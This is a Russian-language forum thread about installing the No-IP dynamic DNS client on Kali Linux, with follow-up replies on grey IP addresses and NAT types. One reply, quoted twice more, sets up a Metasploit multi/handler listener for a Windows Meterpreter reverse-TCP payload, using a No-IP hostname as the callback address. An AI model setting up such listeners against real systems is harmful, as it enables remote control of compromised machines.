No-IP, или что делать если ip не белый

[kot-gor]

Всем привет, часто в ветке форума встречаю, что делать если у меня нет белого ip? Один из вариантов это использовать сервис no-ip.Сейчас я постараюсь подробно рассказать как можно его установить в среде всеми нами любимого kali, и так поехали!!
Самое первое это заходим по адресу

Ссылка скрыта от гостей

проходим регистрацию.
далее на этом же сайте скачиваем клиент.

после того как скачали,копируем в удобное место, распаковываем, и переходим в директорию с распакованным пакетом.

Далее командой make install запускаем установку данного пакета.

в процессе указываем свой почтовый ящик,который вводили при регистрации no-ip.
пароль,а также выбираем интервал обновления,я выбрал 5 минут. по умолчанию 30.
Так же у нас спросят Do you wish to run something at successful update?[N] (y/N) - Нажмите "y" чтобы обновить хост сейчас.

Запускается no-ip командой командой no-ip2

Вот и все, как видите ничего сложно.всем спасибо за внимания и удачи.

 

[MAdDog719]

Обязательно попробую. Спасибо

 

[m0tion]

Можно устанавливать не обязательно на Linux. Я например на роутере(Mikrotik) скрипт поставил.

 

[kot-gor]

Можно устанавливать не обязательно на Linux. Я например на роутере(Mikrotik) скрипт поставил.

да конечно, здесь я описал один из вариантов..

 

[Vander]

Наконец-то, кто то это описал)) Все никак руки не доходили. Спасибо за статью.

 

[fvn]

Может стоит изменить название на "что делать если ip динамический". В случае серых адресов No-Ip не поможет.

 

[kot-gor]

Может стоит изменить название на "что делать если ip динамический". В случае серых адресов No-Ip не поможет.

Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168.... после NAT, адрес самого роутера в сети 10.10....(что и есть серый). Все прекрасно работает!

 

[MAdDog719]

Что такое не везет

И как с этим бороться?

 

[kot-gor]

возможно с паролем или логином ошиблись

 

[MAdDog719]

возможно, вечером буду дома попробую еще раз.

 

[<~DarkNode~>]

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j

 

[kot-gor]

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j

И не забыть пробросить нужные порты в роутере .

 

[m0tion]

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j

У меня всё проще. Достаточно указать LHOST = IP машины с msf и пробросить порты в роутере

 

[kot-gor]

у вас белый статический ip, у многих такое отсутствует...

 

[DoberGroup]

Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168.... после NAT, адрес самого роутера в сети 10.10....(что и есть серый). Все прекрасно работает!

А как Вы через провайдерский NAT, простите, порты пробрасываете? DDNS это ведь не самоцель, это вспомогательный инструмет

 

[kot-gor]

А как Вы через провайдерский NAT, простите, порты пробрасываете? DDNS это ведь не самоцель, это вспомогательный инструмет

Я пробрасываю порты только на своем роутере.

 

[DoberGroup]

Я пробрасываю порты только на своем роутере.

А смысл?
Вы пишете, что внешний адрес у Вас 10.х.х.х, не маршрутизируемый
Значит - Вы за провайдерским NAT (кстати, каким? Конусным, симметричным, порт-/адрес-определяемым?)
Что Вам даст проброс портов на роутере, их все равно из внешнего мира не будет видно?

 

[kot-gor]

я не смотрел топологию провайдера..хотя интерес вы подогрели,нужно на досуге глянуть.

 

[Ishikawa]

Немного теории

Cone NAT
Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Любой пакет с внешнего хоста, посланный на адрес 1.1.1.2:8801 будет отправлен на 192.168.0.2:2210

Full cone nat

Address-Restricted cone NAT или Restricted cone NAT.
Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Пакет с любого порта внешнего хоста, посланный на адрес 1.1.1.2:8801 будет отправлен на 192.168.0.2:2210 только в случае, если 192.168.0.2:2210 предварительно посылал пакет на этот внешний хост.

Port-Restricted cone NAT
Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Внешний хост (1.1.1.30:1234) может послать пакет на 192.168.0.2:2210 через 1.1.1.2:8801 только в случае если ранее 192.168.0.2:2210 слал пакет на 1.1.1.30:1234

Symmetric NAT
Каждый пакет с определенного внутреннего IP адреса:порта на определенный внешний IP адрес:порт будет иметь после трансляции уникальный внешний адрес порт. Соответственно, пакет с одного и того-же внутреннего адреса:порта, но посланный на другой внешний хост или порт после трансляции будет иметь другой внешний адрес-порт. Внешние хосты могут послать обратный пакет только на те хосты:порты откуда они получили пакеты.

 

[kot-gor]

Спасибо, очень подробный мануал.